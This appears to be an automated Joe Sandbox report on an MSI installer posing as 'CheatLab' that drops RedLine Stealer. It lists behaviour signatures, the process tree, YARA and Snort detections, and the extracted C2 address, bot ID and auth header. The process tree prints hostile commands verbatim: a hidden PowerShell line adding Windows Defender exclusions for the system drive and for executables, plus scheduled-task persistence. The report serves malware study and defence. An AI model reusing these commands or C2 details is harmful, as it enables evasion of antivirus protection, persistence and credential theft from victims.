Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cheat.Lab.2.7.1.msi

Overview

General Information

Sample Name:Cheat.Lab.2.7.1.msi
Analysis ID:1337011
MD5:b48140e9f5fd148e60a91b241800924f
SHA1:240eafdbf53006595e5d99c397b838e20c1f6b3d
SHA256:29c3776283532730c47223fccc1e347daf777570c8fc87a22740664aaa61790b
Tags:msiRedlineStealer
Infos:

Detection

RedLine
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Query firmware table information (likely to detect VMs)
Drops large PE files
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Suspicious powershell command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
May check the online IP address of the machine
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Checks for available system drives (often done to infect USB drives)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7324 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7356 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7404 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5E03ED5AB1478F6152C3A4AE0716FC8E C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • LuaJIT.exe (PID: 8056 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 95B55371B50778590D2468C3B9D3EEAE)
    • msiexec.exe (PID: 7596 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding F39516897EEA46074340BE595843CEF6 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 7660 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3B80CDA5B5BAFA68ED05607E689893EE E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSIF5A3.tmp (PID: 7704 cmdline: C:\Windows\Installer\MSIF5A3.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat MD5: B9545ED17695A32FACE8C3408A6A3553)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7792 cmdline: powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • LuaJIT.exe (PID: 7892 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 95B55371B50778590D2468C3B9D3EEAE)
    • schtasks.exe (PID: 7212 cmdline: schtasks /create /sc daily /st 12:57 /f /tn ServerUpdate_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2640 cmdline: schtasks /create /sc daily /st 12:57 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • connect.exe (PID: 7816 cmdline: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe MD5: A8A24AF1D9E83BE788BD28D64967FE32)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NzEx.exe (PID: 7440 cmdline: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua MD5: 95B55371B50778590D2468C3B9D3EEAE)
  • LuaJIT.exe (PID: 7564 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 95B55371B50778590D2468C3B9D3EEAE)
  • LuaJIT.exe (PID: 4456 cmdline: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua MD5: 95B55371B50778590D2468C3B9D3EEAE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": "91.103.252.8:29975", "Bot Id": "@hydroshot", "Authorization Header": "c43fe9f8ce3a75dba720400bd7ee9a4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000016.00000002.2400212842.00000000021F2000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000016.00000002.2399412192.0000000000425000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000016.00000002.2401674752.0000000002AB4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                22.2.connect.exe.21f0000.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  22.2.connect.exe.21f0000.1.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x3f8ca:$v2_1: ListOfProcesses
                  • 0x3f40e:$v4_3: base64str
                  • 0x415d0:$v4_4: stringKey
                  • 0x3b177:$v4_5: BytesToStringConverted
                  • 0x3a520:$v4_6: FromBase64
                  • 0x3bddf:$v4_8: procName
                  • 0x3acff:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  22.2.connect.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    22.2.connect.exe.400000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x1fc94:$s5: delete[]
                    • 0x1eb48:$s6: constructor or from DllMain.
                    • 0x618da:$v2_1: ListOfProcesses
                    • 0x6141e:$v4_3: base64str
                    • 0x635e0:$v4_4: stringKey
                    • 0x5d187:$v4_5: BytesToStringConverted
                    • 0x5c530:$v4_6: FromBase64
                    • 0x5ddef:$v4_8: procName
                    • 0x5cd0f:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.491.103.252.849740299752046105 11/04/23-01:36:08.639119
                    SID:2046105
                    Source Port:49740
                    Destination Port:29975
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:91.103.252.8192.168.2.429975497402046056 11/04/23-01:36:08.831287
                    SID:2046056
                    Source Port:29975
                    Destination Port:49740
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.491.103.252.849740299752046045 11/04/23-01:36:07.651843
                    SID:2046045
                    Source Port:49740
                    Destination Port:29975
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: 91.103.252.8:29975Avira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
                    Found malware configuration
                    Source: 00000016.00000002.2401674752.00000000026F1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "91.103.252.8:29975", "Bot Id": "@hydroshot", "Authorization Header": "c43fe9f8ce3a75dba720400bd7ee9a4d"}
                    Multi AV Scanner detection for domain / URL
                    Source: 91.103.252.8:29975Virustotal: Detection: 15%Perma Link
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49738 version: TLS 1.2
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab CorpJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF5A3.tmp, 00000005.00000000.1734572937.0000000000627000.00000002.00000001.01000000.00000003.sdmp, MSIF5A3.tmp, 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 6cf1b5.msi.1.dr, MSID5C6.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 6cf1b5.msi.1.dr, MSID5C6.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, 6cf1b5.msi.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSID42B.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, 6cf1b5.msi.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSID42B.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF5A3.tmp, 00000005.00000000.1734572937.0000000000627000.00000002.00000001.01000000.00000003.sdmp, MSIF5A3.tmp, 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF459.tmp.1.dr, MSIF4F6.tmp.1.dr
                    Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0061B02D FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_0061B02D

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.4:49740 -> 91.103.252.8:29975
                    Source: TrafficSnort IDS: 2046105 ET TROJAN Redline Stealer TCP CnC Activity - MSValue (Outbound) 192.168.2.4:49740 -> 91.103.252.8:29975
                    Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer Activity (Response) 91.103.252.8:29975 -> 192.168.2.4:49740
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 91.103.252.8:29975
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: unknownDNS query: name: ip-api.com
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: global trafficTCP traffic: 192.168.2.4:49740 -> 91.103.252.8:29975
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: connect.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: connect.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: connect.exe.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: connect.exe.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: connect.exe.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: connect.exe.9.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                    Source: connect.exe.9.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: connect.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: connect.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: connect.exe.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                    Source: connect.exe.9.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                    Source: connect.exe.9.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                    Source: connect.exe, 00000016.00000002.2401674752.0000000002755000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                    Source: connect.exe.9.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: connect.exe.9.drString found in binary or memory: http://ocsp.digicert.com0A
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, connect.exe.9.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.drString found in binary or memory: http://ocsp.digicert.com0C
                    Source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSIF459.tmp.1.dr, MSID5C6.tmp.0.dr, MSID42B.tmp.0.dr, MSIF4F6.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                    Source: connect.exe.9.drString found in binary or memory: http://ocsp.digicert.com0X
                    Source: connect.exe.9.drString found in binary or memory: http://ocsp.sectigo.com0
